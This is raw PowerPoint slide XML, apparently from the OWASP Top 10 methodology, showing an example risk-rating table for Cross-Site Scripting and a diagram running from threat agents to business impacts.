                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating also does not take into account the actual impact on your business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Your organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> will have to decide how much security risk from applications and APIs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>the organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>is willing to accept given your culture, industry, and regulatory environment. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>The following illustrates our calculation of the risk for A3: Cross-Site Scripting, as an example. XSS is so prevalent it warranted the only ‘VERY WIDESPREAD’ prevalence value of 0. All other risks ranged from widespread to uncommon (value 1 to 3).</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775831764"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6324600"/>
          <a:ext cx="6629400" cy="2606453"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="625253">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r>
              <a:tr h="491782">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>VERY WIDESPREAD</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FF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>App / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2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489418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0</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smtClean="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smtClean="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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</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smtClean="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000" b="1" kern="0" baseline="0" dirty="0" smtClean="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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</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smtClean="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smtClean="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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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smtClean="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smtClean="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smtClean="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smtClean="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smtClean="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pic>
        <p:nvPicPr>
          <p:cNvPr id="27650" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1731326" y="7585468"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2828606" y="8169053"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819206" y="8545588"/>
            <a:ext cx="340158" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="238836" y="6359784"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2961564" y="1077920"/>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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="52" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="65" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1447800" y="1089827"/>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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="54" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1054093"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="55" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="53" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="821288" y="1263652"/>
                <a:ext cx="626512" cy="4769"/>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57" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="51" idx="3"/>
                <a:endCxn id="54" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3981932" y="1268420"/>
                <a:ext cx="818668" cy="1"/>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58" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="59" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1077920"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="60" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="54" idx="4"/>
                <a:endCxn id="59" idx="1"/>
